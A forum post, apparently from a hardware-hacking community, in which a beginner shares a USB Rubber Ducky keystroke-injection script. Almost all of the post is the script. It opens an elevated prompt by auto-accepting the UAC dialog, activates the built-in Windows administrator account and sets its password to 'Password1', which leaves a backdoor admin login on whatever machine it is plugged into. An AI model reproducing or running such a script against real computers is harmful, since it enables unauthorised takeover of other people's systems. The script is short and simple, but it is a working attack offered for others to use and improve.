Jump to content

Recommended Posts

Hello everyone,

I am new to the USB Rubber Ducky and today I made my first script. It is pretty simle, but it works.

This script will open a powershell with administratior privleges after bypassing UAC, then it will activate the build-in administrator account and change the password to Password1.

If anyone has any changes that would make this better, please share.

REM Author securityoverride, with code based off of Hak5Darren
REM Creation Date 5-26-15
REM This script will activate the default admin account and change the password

REM ***Bypass UAC***
DELAY 2000
WINDOWS r
DELAY 500
STRING powershell Start-process cmd.exe -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 500

REM ***Activate the default admin account***
STRING net user administrator /active:yes
ENTER
DELAY 500

REM ***Change the default admin password to "Password1"***
STRING net user administrator Password1
ENTER
DELAY 500

REM ***GTFO***
STRING exit
ENTER

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...